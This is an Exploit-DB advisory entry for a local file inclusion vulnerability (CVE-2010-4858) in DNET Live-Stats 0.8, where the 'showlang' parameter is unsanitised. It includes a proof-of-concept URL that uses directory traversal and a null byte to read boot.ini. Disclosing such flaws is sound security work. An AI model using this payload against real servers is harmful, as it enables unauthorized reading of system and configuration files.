DNET Live-Stats 0.8 - Local File Inclusion

Author: blake
type: webapps
platform: php
port: 
date_added: 2010-10-04 
date_updated: 2010-10-04 
verified: 1 
codes: CVE-2010-4858;OSVDB-76017 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comdnet-live-stats-0.8-rc8.zip

# Exploit Title: DNET Live-Stats 0.8 Local File Inclusion
# Date: 10-04-10
# Author: Blake
# Software Link: http://sourceforge.net/projects/dnetlivestats/files/0.8/dnet-live-stats-0.8-rc8.zip/download
# Version: 0.8 rc8
# Tested on: Windows XP SP3 running xampp lite

The showlang parameter does not properly sanitize user input.

POC:
http://127.0.0.1/dnet/team.rc5-72.php?showlang=../../../../../../../../../../../../boot.ini%00